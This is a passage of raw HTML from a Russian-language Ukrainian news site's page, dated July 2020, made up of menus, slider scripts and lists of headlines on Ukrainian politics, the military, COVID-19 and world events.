href="https://enovosty.com/ekonomika">Экономика</a></li><li><a href="https://enovosty.com/finance">Финансы</a></li><li><a href="https://enovosty.com/markets">Рынки</a></li><li><a href="https://enovosty.com/society">Общество</a></li><li><a href="https://enovosty.com/tehnologii">Технологии</a></li><li><a href="https://enovosty.com/auto">Авто</a></li><li ><a href="https://enovosty.com/blogs">Мнения</a></li><li ><a href="https://enovosty.com/person">Досье</a></li><li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li><li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;"><a href="#">Ещё...</a><ul class="sub-menu"><li><a href="https://enovosty.com/o-proekte">О проекте</a></li><li><a href="https://enovosty.com/author">Авторы</a></li><li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li><li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li><li><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li></ul></li><li id="menu-item-4513417" ><a href="https://enovosty.com/specproekty/rynok-zemli">Рынок земли</a></li><li id="menu-item-4513417" ><a href="https://enovosty.com/tag/COVID-19">COVID-19</a></li></ul></div><script>jQuery(document).ready(function($){if(jQuery( window ).width() < 606){var touchHover = function() {$('.first').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});$('.finance').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});};$(document).ready(function() { touchHover(); });}});</script> </div>  <div id="body"><div class="cls"></div><div id="sidebarLeft_n" style="width:210px;"><script>jQuery(document).ready(function($){$('#slider').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><div class="topnews_single slide"><p style="padding: 0 7px;
font-weight: 700;
font-family: arial,verdana,tahoma;
background: url(/wp-content/themes/eizvestia/img/blueline.jpg) repeat-x;
line-height: 9px;
margin: 2px 0 9px;
text-align: center;"><a href="https://enovosty.com/top-news"><span style="background-color: #fff;
font-size: 12px;
color: #326698;
text-transform: uppercase;
padding: 0 9px;">Топ-новости &nbsp;&nbsp;<i style="font-size: 11px;color: #666;font-style: normal;text-transform: none;">за 24 часа</i></span></a></p><ul id="slider"><li><ul class="tact"><li id="li0" style="width:210px;"><a href="https://enovosty.com/news_society/full/2907-takticheskaya-aviaciya-vozdushnyx-sil-ottachivaet-gruppovuyu-sletannost-i-vozdushnye-boi-minoborony" title="Тактическая авиация Воздушных сил оттачивает групповую слетанность и воздушные бои, - Минобороны"><img width="210" height="156" alt="Тактическая авиация Воздушных сил оттачивает групповую слетанность и воздушные бои, - Минобороны" src="https://enovosty.com/wp-content/uploads/2020/07/650x435-2.jpg"></a><a href="https://enovosty.com/news_society/full/2907-takticheskaya-aviaciya-vozdushnyx-sil-ottachivaet-gruppovuyu-sletannost-i-vozdushnye-boi-minoborony" title="Тактическая авиация Воздушных сил оттачивает групповую слетанность и воздушные бои, - Минобороны" class="name">Тактическая авиация Воздушных сил оттачивает групповую слетанность и воздушные бои, - Минобороны <span>(6716)</span></a></li></ul></li><li><ul class="tact"><li id="li1" style="width:210px;"><a href="https://enovosty.com/news_society/full/2907-v-ukraine-mogut-podeshevet-elektromobili" title="В Украине могут подешеветь электромобили"><img width="210" height="156" alt="В Украине могут подешеветь электромобили" src="https://enovosty.com/wp-content/uploads/2020/07/24351347.jpg"></a><a href="https://enovosty.com/news_society/full/2907-v-ukraine-mogut-podeshevet-elektromobili" title="В Украине могут подешеветь электромобили" class="name">В Украине могут подешеветь электромобили <span>(3100)</span></a></li></ul></li><li><ul class="tact"><li id="li2" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/2907-stalo-izvestno-kak-budet-vyglyadet-vnutri-i-snaruzhi-kosmoplan-dlya-turistov" title="Стало известно, как будет выглядеть внутри и снаружи космоплан для туристов"><img width="210" height="156" alt="Стало известно, как будет выглядеть внутри и снаружи космоплан для туристов" src="https://enovosty.com/wp-content/uploads/2020/07/5a3c7c9f3a559e6d2772d8bf4b434f9f.jpg"></a><a href="https://enovosty.com/news_abroad/full/2907-stalo-izvestno-kak-budet-vyglyadet-vnutri-i-snaruzhi-kosmoplan-dlya-turistov" title="Стало известно, как будет выглядеть внутри и снаружи космоплан для туристов" class="name">Стало известно, как будет выглядеть внутри и снаружи космоплан для туристов <span>(1084)</span></a></li></ul></li><li><ul class="tact"><li id="li3" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/2907-belarus-obyavila-o-zaderzhanii-33-rossijskix-boevikov-iz-chvk-vagnera" title="Беларусь объявила о задержании 33 российских боевиков из ЧВК Вагнера"><img width="210" height="156" alt="Беларусь объявила о задержании 33 российских боевиков из ЧВК Вагнера" src="https://enovosty.com/wp-content/uploads/2020/07/bel_io.jpg"></a><a href="https://enovosty.com/news_abroad/full/2907-belarus-obyavila-o-zaderzhanii-33-rossijskix-boevikov-iz-chvk-vagnera" title="Беларусь объявила о задержании 33 российских боевиков из ЧВК Вагнера" class="name">Беларусь объявила о задержании 33 российских боевиков из ЧВК Вагнера <span>(4284)</span></a></li></ul></li><li><ul class="tact"><li id="li4" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/2907-armyano-azerbajdzhanskij-konflikt-priobretaet-mezhdunarodnyj-xarakter-turciya-napravila-svoi-vojska-v-azerbajdzhan-video" title="Армяно-азербайджанский конфликт приобретает международный характер: Турция направила свои войска в Азербайджан (ВИДЕО)"><img width="210" height="156" alt="Армяно-азербайджанский конфликт приобретает международный характер: Турция направила свои войска в Азербайджан (ВИДЕО)" src="https://enovosty.com/wp-content/uploads/2020/07/fptcmroluw-696x497.jpg"></a><a href="https://enovosty.com/news_abroad/full/2907-armyano-azerbajdzhanskij-konflikt-priobretaet-mezhdunarodnyj-xarakter-turciya-napravila-svoi-vojska-v-azerbajdzhan-video" title="Армяно-азербайджанский конфликт приобретает международный характер: Турция направила свои войска в Азербайджан (ВИДЕО)" class="name">Армяно-азербайджанский конфликт приобретает международный характер: Турция направила свои войска в Азербайджан (ВИДЕО) <span>(6452)</span></a></li></ul></li><li><ul class="tact"><li id="li5" style="width:210px;"><a href="https://enovosty.com/news_society/full/2907-v-minzdrave-sdelali-vazhnoe-zayavlenie-o-rabote-shkol" title="В Минздраве сделали важное заявление о работе школ"><img width="210" height="156" alt="В Минздраве сделали важное заявление о работе школ" src="https://enovosty.com/wp-content/uploads/2020/07/stepanov.jpg"></a><a href="https://enovosty.com/news_society/full/2907-v-minzdrave-sdelali-vazhnoe-zayavlenie-o-rabote-shkol" title="В Минздраве сделали важное заявление о работе школ" class="name">В Минздраве сделали важное заявление о работе школ <span>(5852)</span></a></li></ul></li><li><ul class="tact"><li id="li6" style="width:210px;"><a href="https://enovosty.com/news_politics/full/2907-v-snbo-poobeshhali-neozhidannyj-otvet-na-ucheniya-rf-u-ukrainskix-granic" title="В СНБО пообещали неожиданный ответ на учения РФ у украинских границ"><img width="210" height="156" alt="В СНБО пообещали неожиданный ответ на учения РФ у украинских границ" src="https://enovosty.com/wp-content/uploads/2020/07/danilov.jpg"></a><a href="https://enovosty.com/news_politics/full/2907-v-snbo-poobeshhali-neozhidannyj-otvet-na-ucheniya-rf-u-ukrainskix-granic" title="В СНБО пообещали неожиданный ответ на учения РФ у украинских границ" class="name">В СНБО пообещали "неожиданный" ответ на учения РФ у украинских границ <span>(3244)</span></a></li></ul></li><li><ul class="tact"><li id="li7" style="width:210px;"><a href="https://enovosty.com/news_technology/full/2907-vo-francii-startovala-sborka-krupnejshego-v-mire-termoyadernogo-reaktora-iter" title="Во Франции стартовала сборка крупнейшего в мире термоядерного реактора ITER"><img width="210" height="156" alt="Во Франции стартовала сборка крупнейшего в мире термоядерного реактора ITER" src="https://enovosty.com/wp-content/uploads/2020/07/platform_may_2020_riche_ed_small-e1595960245169.jpg"></a><a href="https://enovosty.com/news_technology/full/2907-vo-francii-startovala-sborka-krupnejshego-v-mire-termoyadernogo-reaktora-iter" title="Во Франции стартовала сборка крупнейшего в мире термоядерного реактора ITER" class="name">Во Франции стартовала сборка крупнейшего в мире термоядерного реактора ITER <span>(4272)</span></a></li></ul></li><li><ul class="tact"><li id="li8" style="width:210px;"><a href="https://enovosty.com/news_society/full/2807-stalo-izvestno-v-kakix-oblastyax-nelzya-oslablyat-karantin" title="Стало известно, в каких областях нельзя ослаблять карантин"><img width="210" height="156" alt="Стало известно, в каких областях нельзя ослаблять карантин" src="https://enovosty.com/wp-content/uploads/2020/07/47_main.jpg"></a><a href="https://enovosty.com/news_society/full/2807-stalo-izvestno-v-kakix-oblastyax-nelzya-oslablyat-karantin" title="Стало известно, в каких областях нельзя ослаблять карантин" class="name">Стало известно, в каких областях нельзя ослаблять карантин <span>(1340)</span></a></li></ul></li><li><ul class="tact"><li id="li9" style="width:210px;"><a href="https://enovosty.com/news_society/full/2807-ukraina-polsha-i-litva-sozdali-lyublinskij-treugolnik" title="Украина, Польша и Литва создали «Люблинский треугольник»"><img width="210" height="156" alt="Украина, Польша и Литва создали «Люблинский треугольник»" src="https://enovosty.com/wp-content/uploads/2020/07/86_main.jpeg"></a><a href="https://enovosty.com/news_society/full/2807-ukraina-polsha-i-litva-sozdali-lyublinskij-treugolnik" title="Украина, Польша и Литва создали «Люблинский треугольник»" class="name">Украина, Польша и Литва создали «Люблинский треугольник» <span>(2112)</span></a></li></ul></li><li><ul class="tact"><li id="li10" style="width:210px;"><a href="https://enovosty.com/news_society/full/2807-v-ukraine-obyavleno-shtormovoe-preduprezhdenie" title="В Украине объявлено штормовое предупреждение"><img width="210" height="156" alt="В Украине объявлено штормовое предупреждение" src="https://enovosty.com/wp-content/uploads/2020/07/d29308b-shtormove-poperedzhennya-1280x640.jpg"></a><a href="https://enovosty.com/news_society/full/2807-v-ukraine-obyavleno-shtormovoe-preduprezhdenie" title="В Украине объявлено штормовое предупреждение" class="name">В Украине объявлено штормовое предупреждение <span>(5984)</span></a></li></ul></li><li><ul class="tact"><li id="li11" style="width:210px;"><a href="https://enovosty.com/news_society/full/2807-voennym-peredali-dva-obnovlennyx-tanka-bulat" title="Военным передали два обновленных танка Булат"><img width="210" height="156" alt="Военным передали два обновленных танка Булат" src="https://enovosty.com/wp-content/uploads/2020/07/df3d0f4-bulat01-570x380.jpg"></a><a href="https://enovosty.com/news_society/full/2807-voennym-peredali-dva-obnovlennyx-tanka-bulat" title="Военным передали два обновленных танка Булат" class="name">Военным передали два обновленных танка "Булат" <span>(3008)</span></a></li></ul></li><li><ul class="tact"><li id="li12" style="width:210px;"><a href="https://enovosty.com/news_politics/full/2807-silovoj-variant-deokkupacii-kryma-kurt-volker-ocenil-posledstviya" title="Силовой вариант деоккупации Крыма: Курт Волкер оценил последствия"><img width="210" height="156" alt="Силовой вариант деоккупации Крыма: Курт Волкер оценил последствия" src="https://enovosty.com/wp-content/uploads/2020/07/volker.jpg"></a><a href="https://enovosty.com/news_politics/full/2807-silovoj-variant-deokkupacii-kryma-kurt-volker-ocenil-posledstviya" title="Силовой вариант деоккупации Крыма: Курт Волкер оценил последствия" class="name">Силовой вариант деоккупации Крыма: Курт Волкер оценил последствия <span>(4480)</span></a></li></ul></li><li><ul class="tact"><li id="li13" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/2807-estoniya-nachala-stroit-stenu-na-granice-s-rf" title="Эстония начала строить стену на границе с РФ"><img width="210" height="156" alt="Эстония начала строить стену на границе с РФ" src="https://enovosty.com/wp-content/uploads/2020/07/163836.jpg"></a><a href="https://enovosty.com/news_abroad/full/2807-estoniya-nachala-stroit-stenu-na-granice-s-rf" title="Эстония начала строить стену на границе с РФ" class="name">Эстония начала строить "стену" на границе с РФ <span>(5684)</span></a></li></ul></li><li><ul class="tact"><li id="li14" style="width:210px;"><a href="https://enovosty.com/news_politics/full/2807-boeviki-v-pervyj-zhe-den-polnoj-tishiny-uspeli-ne-raz-ee-narushit" title="Боевики в первый же день полной тишины успели не раз ее нарушить"><img width="210" height="156" alt="Боевики в первый же день полной тишины успели не раз ее нарушить" src="https://enovosty.com/wp-content/uploads/2020/07/mil.in_.jpg"></a><a href="https://enovosty.com/news_politics/full/2807-boeviki-v-pervyj-zhe-den-polnoj-tishiny-uspeli-ne-raz-ee-narushit" title="Боевики в первый же день полной тишины успели не раз ее нарушить" class="name">Боевики в первый же день "полной тишины" успели не раз ее нарушить <span>(1628)</span></a></li></ul></li></ul></div><div class="wiget simple_pr" id="photoPromo" style="background: #ffe3c8;"><div class="caption"><p style=" text-transform: uppercase; font-weight: 700; font-family: arial,verdana,tahoma; margin: 0; display: block; float: left; color: #fff; padding: 0 5px 0 4px; background-color: #f93; height: 17px; font-size: 12px;
"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div><div class="topnews_single slide gallery2" style="width: 168px; height: 230px; padding: 10px 10px 0; background: #fff; margin: 10px;"><ul id="slider_gallery2"><li><ul class="tact"><li id="li0" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=559&pid=12164" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/shedev_foto/thumbs/thumbs_00.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Фото реальной жизни в каждом снимке от мастеров"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=559&pid=12164" title="Фото реальной жизни в каждом снимке от мастеров" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Фото реальной жизни в каждом снимке от мастеров</a></li></ul></li><li><ul class="tact"><li id="li1" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=558&pid=12156" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/suzhety/thumbs/thumbs_13.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Фото, словно скопированные с картин Возрождения"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=558&pid=12156" title="Фото, словно скопированные с картин Возрождения" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Фото, словно скопированные с картин Возрождения</a></li></ul></li><li><ul class="tact"><li id="li2" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=557&pid=12137" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/teni/thumbs/thumbs_shadows08.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Художник, который рисует тенью"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=557&pid=12137" title="Художник, который рисует тенью" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Художник, который рисует тенью</a></li></ul></li><li><ul class="tact"><li id="li3" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=556&pid=12114" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/eda_art/thumbs/thumbs_00.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Еда которая порадуют перфекциониста"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=556&pid=12114" title="Еда которая порадуют перфекциониста" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Еда которая порадуют перфекциониста</a></li></ul></li></ul></div> <div class="cls"></div> <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a></div><script>jQuery(document).ready(function($){$('#slider_gallery2').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><style>.topnews_single.gallery2 div.anythingSlider-minimalist-round span.arrow{height:160px}</style><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption" style=""><p style="font-size: 12px; height: 17px; color: #fff; background-color: #346796; padding: 0 5px; display: inline; text-transform: uppercase; font-weight: 700;font-family: arial,verdana,tahoma;">Новости мира</p></div><div class='cls'></div><span class='news_date'>29.07.2020 г.</span><br /><div class="post_news"><span id="post-4813449"><span class="postDate">22:55</span><a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-protesty-v-rossii-vsled-za-xabarovskom-protestuyut-lyudi-v-nizhnem-novgorode">Протесты в России: Вслед за Хабаровском протестуют люди в Нижнем Новгороде</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4813350"><span class="postDate">21:55</span><a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-foto-dnya-39-let-so-dnya-svadby-princessy-diany-i-princa-charlza-foto">Фото дня: 39 лет со дня свадьбы принцессы Дианы и принца Чарльза (ФОТО)</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4813445"><span class="postDate">21:30</span><a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-v-ssha-poezd-zagorelsya-pryamo-posredi-mosta-plamya-oxvatilo-vse-vagony-video">В США поезд загорелся прямо посреди моста - пламя охватило все вагоны ( ВИДЕО)</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4813427"><span class="postDate">20:40</span><a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-rossijskie-specsluzhby-ispolzuyut-angloyazychnye-veb-sajty-dlya-rasprostraneniya-dezinformacii-associated-press">Российские спецслужбы используют англоязычные веб-сайты для распространения дезинформации, - Associated Press</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4813412"><span class="postDate">19:46</span><a class="postTitle" href="https://enovosty.com/rerite-ru/full/2907-ssha-pereveli-svoi-vojska-v-persidskom-zalive-v-sostoyanie-boevoj-gotovnosti-reuters">США перевели свои войска в Персидском заливе в состояние боевой готовности, - Reuters</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4813397"><span class="postDate">18:48</span><a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-stalo-izvestno-kak-budet-vyglyadet-vnutri-i-snaruzhi-kosmoplan-dlya-turistov">Стало известно, как будет выглядеть внутри и снаружи космоплан для туристов</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4813394"><span class="postDate">18:19</span><a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-kitajskie-xakery-sovershili-kiberataki-na-vatikan-reuters">Китайские хакеры совершили кибератаки на Ватикан, - Reuters</a><br /><div class="postFields"></div></span></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/news_abroad">Все новости мира</a></div><div class="wiget simple_line analitika"> <div class="caption"><p style="text-transform: uppercase;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;"><a href="https://enovosty.com/articles">Аналитика</a></p></div><div class="block"><div class="info"><span class="postDate">29.07.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/2907-viktor-taran-novoe-peremirie-na-donbasse-mozhet-okazatsya-troyanskim-konem-dlya-ukrainy">Виктор Таран: Новое перемирие на Донбассе может оказаться «троянским конем» для Украины</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/2907-viktor-taran-novoe-peremirie-na-donbasse-mozhet-okazatsya-troyanskim-konem-dlya-ukrainy"><img width="230" alt="Виктор Таран: Новое перемирие на Донбассе может оказаться «троянским конем» для Украины" src="/wp-content/uploads/2020/07/donbass2-1.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/2907-viktor-taran-novoe-peremirie-na-donbasse-mozhet-okazatsya-troyanskim-konem-dlya-ukrainy">Почему захват автобуса в Луцке выглядит как плохо срежиссированный сценарий и почему вся рать Авакова с собаками, дронами и Антоном Геращенко оказываются ...</a></span></div><div class="block"><div class="info"><span class="postDate">28.07.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/ekonomika/full/2807-koronakrizis-evrope-razdayut-besplatno-dengi-ukrainu-dushat-procentami-i-usloviyami-mvf">Коронакризис: Европе раздают бесплатно деньги, Украину душат процентами и условиями МВФ</a></p><div class="cblock"><a href="https://enovosty.com/ekonomika/full/2807-koronakrizis-evrope-razdayut-besplatno-dengi-ukrainu-dushat-procentami-i-usloviyami-mvf"><img width="230" alt="Коронакризис: Европе раздают бесплатно деньги, Украину душат процентами и условиями МВФ" src="/wp-content/uploads/2020/07/evrobonds_cover.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/ekonomika/full/2807-koronakrizis-evrope-razdayut-besplatno-dengi-ukrainu-dushat-procentami-i-usloviyami-mvf">Украина опять, как нынче модно говорить, не в тренде, а говоря по-нашему - на задворках европейской цивилизации, в данном случае в вопросах борьбы с ...</a></span></div><div class="block"><div class="info"><span class="postDate">24.07.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/2407-takaya-strannaya-armyano-azerbajdzhanskaya-vojna-komu-eto-vygodno-prichiny-novoj-eskalacii">Такая странная армяно-азербайджанская война: Кому это выгодно - причины новой эскалации</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/2407-takaya-strannaya-armyano-azerbajdzhanskaya-vojna-komu-eto-vygodno-prichiny-novoj-eskalacii"><img width="230" alt="Такая странная армяно-азербайджанская война: Кому это выгодно - причины новой эскалации" src="/wp-content/uploads/2020/07/cover_voyna_armeniya_azerbaydjan_ed.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/2407-takaya-strannaya-armyano-azerbajdzhanskaya-vojna-komu-eto-vygodno-prichiny-novoj-eskalacii">Новый виток армяно-азербайджанского конфликта выглядит более чем странным, поскольку в корне отличается от хорошо доселе известного сценария вооруженного ...</a></span></div></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption"><p style="font-weight: 700; font-family: arial,verdana,tahoma; font-size: 12px; text-transform: uppercase; margin: 0; padding: 0; text-align: left;height: 17px;"><a href="https://enovosty.com/news/">Последние новости</a></p></div><div class='cls'></div><span class='news_date'>29.07.2020 г.</span><br /><div class="post_news"> <span id="post-4813431"> <span class="postDate">22:58</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2907-v-ssha-rebyonok-umer-ot-koronavirusa-vo-sne">В США ребёнок умер от коронавируса во сне</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813449"> <span class="postDate">22:55</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-protesty-v-rossii-vsled-za-xabarovskom-protestuyut-lyudi-v-nizhnem-novgorode">Протесты в России: Вслед за Хабаровском протестуют люди в Нижнем Новгороде</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813386"> <span class="postDate">21:58</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/2907-igor-chalenko-rasskazal-o-vozmozhnosti-dostizheniya-rosta-vvp-v-2021-godu">4,6% роста ВВП не просто оптимистические, в нынешних условиях они нереальны - Игорь Чаленко</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813350"> <span class="postDate">21:55</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-foto-dnya-39-let-so-dnya-svadby-princessy-diany-i-princa-charlza-foto">Фото дня: 39 лет со дня свадьбы принцессы Дианы и принца Чарльза (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813445"> <span class="postDate">21:30</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-v-ssha-poezd-zagorelsya-pryamo-posredi-mosta-plamya-oxvatilo-vse-vagony-video">В США поезд загорелся прямо посреди моста - пламя охватило все вагоны ( ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813427"> <span class="postDate">20:40</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-rossijskie-specsluzhby-ispolzuyut-angloyazychnye-veb-sajty-dlya-rasprostraneniya-dezinformacii-associated-press">Российские спецслужбы используют англоязычные веб-сайты для распространения дезинформации, - Associated Press</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813424"> <span class="postDate">20:27</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2907-avianesushhij-krejser-admiral-kuznecov-planomerno-vozvrashhaetsya-v-rzhavyj-lom-zloj-odessit">Авианесущий крейсер "Адмирал Кузнецов" планомерно возвращается в ржавый лом, - Злой Одессит</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813412"> <span class="postDate">19:46</span> <a class="postTitle" href="https://enovosty.com/rerite-ru/full/2907-ssha-pereveli-svoi-vojska-v-persidskom-zalive-v-sostoyanie-boevoj-gotovnosti-reuters">США перевели свои войска в Персидском заливе в состояние боевой готовности, - Reuters</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813407"> <span class="postDate">19:19</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2907-takticheskaya-aviaciya-vozdushnyx-sil-ottachivaet-gruppovuyu-sletannost-i-vozdushnye-boi-minoborony">Тактическая авиация Воздушных сил оттачивает групповую слетанность и воздушные бои, - Минобороны</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813402"> <span class="postDate">18:59</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2907-v-ukraine-mogut-podeshevet-elektromobili">В Украине могут подешеветь электромобили</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813397"> <span class="postDate">18:48</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-stalo-izvestno-kak-budet-vyglyadet-vnutri-i-snaruzhi-kosmoplan-dlya-turistov">Стало известно, как будет выглядеть внутри и снаружи космоплан для туристов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813394"> <span class="postDate">18:19</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-kitajskie-xakery-sovershili-kiberataki-na-vatikan-reuters">Китайские хакеры совершили кибератаки на Ватикан, - Reuters</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813392"> <span class="postDate">17:59</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2907-kabmin-zamenil-bebi-boksy-na-denezhnuyu-pomoshh-podrobnosti">Кабмин заменил бэби-боксы на денежную помощь: подробности</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813436"> <span class="postDate">17:59</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2907-v-odesskoj-oblasti-arxeologi-nashli-polnuyu-butylku-18-veka">В Одесской области археологи нашли полную бутылку 18 века</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813388"> <span class="postDate">17:26</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-dlya-borby-s-pandemiyami-vazhno-peresmotret-otnoshenie-s-prirodoj-the-guardian">Для борьбы с пандемиями важно пересмотреть отношение с природой, - The Guardian</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813384"> <span class="postDate">16:46</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2907-kabmin-odobrilpilot-po-vnedreniyu-edinogo-e-bileta-na-transport">Кабмин одобрил "пилот" по внедрению единого э-билета на транспорт</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813322"> <span class="postDate">16:41</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2907-foto-dnya-segodnya-den-sil-specoperacij-vsu-kak-geroev-pozdravili-v-seti">Фото дня: Сегодня день Сил спецопераций ВСУ: как героев поздравили в Сети</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813380"> <span class="postDate">16:19</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2907-na-stolichnom-zheleznodorozhnom-vokzale-kinologi-proveli-takticheskie-ucheniya-video">На столичном железнодорожном вокзале кинологи провели тактические учения (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813377"> <span class="postDate">16:01</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2907-v-pravitelstve-rasskazali-chto-dast-ukraine-otkrytoe-nebo-s-es">В правительстве рассказали, что даст Украине "открытое небо" с ЕС</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813374"> <span class="postDate">15:40</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2907-pod-zhitomirom-arxeologi-obnaruzhili-klad-vremen-drevnego-rima">Под Житомиром археологи обнаружили клад времен Древнего Рима</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813373"> <span class="postDate">15:39</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-belarus-obyavila-o-zaderzhanii-33-rossijskix-boevikov-iz-chvk-vagnera">Беларусь объявила о задержании 33 российских боевиков из ЧВК Вагнера</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813372"> <span class="postDate">15:30</span> <a class="postTitle" 